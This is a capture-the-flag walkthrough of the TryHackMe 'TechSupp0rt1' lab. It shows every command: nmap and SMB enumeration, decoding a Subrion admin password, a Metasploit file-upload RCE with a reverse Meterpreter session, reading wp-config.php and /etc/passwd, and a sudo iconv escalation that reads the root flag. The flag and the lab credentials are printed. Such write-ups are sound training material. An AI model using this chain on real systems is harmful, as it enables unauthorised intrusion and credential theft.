Introduction

TechSupp0rt1 is a beginner–intermediate TryHackMe lab simulating a scammer's website. It covers web enumeration, SMB discovery, credential decoding, an RCE via Subrion file-upload, and privilege escalation to root.

Initial reconnaissance

I began reconnaissance with an aggressive Nmap scan to map open services, identify versions, and prioritize attack paths (web, SSH, SMB).

nmap -sV -sC -sS -Pn 10.201.64.113

Key findings from the scan:

  • 22/tcp — OpenSSH 7.2p2 (SSH access)
  • 80/tcp — Apache httpd 2.4.18 (web server; shows default Apache page)
  • 139/tcp & 445/tcp — Samba (SMB) shares (smbd 3.x/4.x)
  • Hostname reported as TECHSUPPORT; OS indicated as Linux (Ubuntu)

With web and SMB open, I focused on web enumeration for creds/uploads and SMB for config/files that might contain secrets.

SMB enumeration — listing shares

Because SMB ports were open, I checked available shares:

smbclient -L 10.201.64.113

 Sharename       Type      Comment
 ---------       ----      -------
 print$          Disk      Printer Drivers
 websvr          Disk      
 IPC$            IPC       IPC Service (TechSupport server (Samba, Ubuntu))

Results:

  • print$ (printer drivers)
  • websvr (disk)
  • IPC$ (IPC service)

The websvr share looked promising, so I mounted it with smbclient:

smbclient //10.201.64.113/websvr
# then:
smb: \> ls
  .                                   D        0  Sat May 29 08:17:38 2021
  ..                                  D        0  Sat May 29 08:03:47 2021
  enter.txt                           N      273  Sat May 29 08:17:38 2021
smb: \> get enter.txt 

Inside the websvr share I found a small file: enter.txt. I downloaded and inspected it.

Discovering credentials in enter.txt

Contents of enter.txt revealed task notes and credentials:

GOALS
=====
1) Make fake popup and host it online on Digital Ocean server
2) Fix subrion site, /subrion doesn't work, edit from panel
3) Edit wordpress website

IMP
===
Subrion creds
|->admin:7sKvntXdPEJaxazce9PXi24zaFrLiKWCk [cooked with magical formula]
Wordpress creds
|->

Decrypting Subrion password and discovering the login page

Finding the Subrion admin credential in enter.txt was a breakthrough, hinting at nearby WordPress creds, so I decoded the "magical" password using CyberChef.

None

After running the appropriate decoding recipe in CyberChef, I successfully retrieved the password:

Scam2021

Web Enumeration — Discovering the Subrion Backend

After decoding the Subrion password, I focused on web enumeration to locate login panels and hidden directories. I ran Dirsearch against the target to map accessible paths:

dirsearch -u http://10.201.64.113

Initial scan highlights:

  • Multiple .htaccess and .htpasswd files returned 403 Forbidden, suggesting potential admin pages or backup files.
  • /phpinfo.php returned 200, providing valuable configuration information.
  • /test/ and /wordpress/wp-login.php returned 200, confirming existing pages.

From SMB notes, I suspected that /wordpress and /test were likely misdirections, pointing to the real backend at /subrion/panel.

Confirming the Subrion Backend

To verify, I added /subrion to my wordlist and reran Dirsearch using a larger directory list:

dirsearch -u http://10.201.64.113 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt

Scan results confirmed:

301 - /subrion -> http://10.201.64.113/subrion/
301 - /wordpress -> http://10.201.64.113/wordpress/
301 - /test -> http://10.201.64.113/test/

This confirmed the Subrion application exists. I navigated to the actual panel:

http://10.201.64.113/subrion/panel/

The Subrion login page was now accessible and ready for testing the credentials retrieved from the SMB share.

None

Gaining Access — Exploiting Subrion CMS

The Subrion login page revealed the application version: Subrion CMS v4.2.1, which is a known vulnerable release.

None

Vulnerability research & exploit

I researched the version and found a file-upload RCE for Subrion v4.2.1. To gain remote code execution I used Metasploit and configured the appropriate module.

None

Exploiting Subrion CMS

I launched Metasploit and configured the exploit:

msfconsole
use exploit/multi/http/subrion_cms_file_upload_rce
set targeturi subrion/
set password Scam2021
set RHOSTS <target ip>
set LHOST <your ip>
run

Successfully, I got a Meterpreter session:

None

Enumerating Users

Inside the target, I checked for users with valid shells:

meterpreter > cat /etc/passwd | grep "sh"
scamsite:x:1000:1000:scammer,,,:/home/scamsite:/bin/bash
mysql:x:111:119:MySQL Server,,,:/nonexistent:/bin/false

Output revealed a user scamsite and a running MySQL service — relevant since this is a WordPress site.

Extracting WordPress Credentials

I inspected the WordPress configuration file to retrieve the database credentials:

cat /var/www/html/wordpress/wp-config.php

Key details:

DB_USER: support
DB_PASSWORD: ImAScammerLOL!123!

Since there was only one standard user, it was safe to assume these credentials belonged to scamsite:

scamsite:ImAScammerLOL!123!

Privilege Escalation

I upgraded the Meterpreter shell and escalated privileges to the scamsite user:

meterpreter > shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
su scamsite
Password: ImAScammerLOL!123!

Now, I had a full shell as scamsite, ready to explore further and locate user or root flags:

scamsite@TechSupport:/var/www/html/subrion/uploads$

Privilege Escalation — Gaining Root Access

With a shell as scamsite, I checked available sudo privileges:

sudo -l

Output revealed:

User scamsite may run the following commands on TechSupport:
    (ALL) NOPASSWD: /usr/bin/iconv

This meant scamsite could run iconv as root without a password — a perfect opportunity for privilege escalation using GTFOBins.

Exploiting iconv for Root

Following GTFOBins instructions, I set the target file to read the root flag:


scamsite@TechSupport:~$ LFILE=/root/root.txt
scamsite@TechSupport:~$ sudo /usr/bin/iconv -f 8859_1 -t 8859_1 "$LFILE"
851b8233a8c09400ec30651bd1529bf1ed02790b  -

Capturing the Root Flag

Executing the command returned the root flag:

None

851b8233a8c09400ec30651bd1529bf1ed02790b
None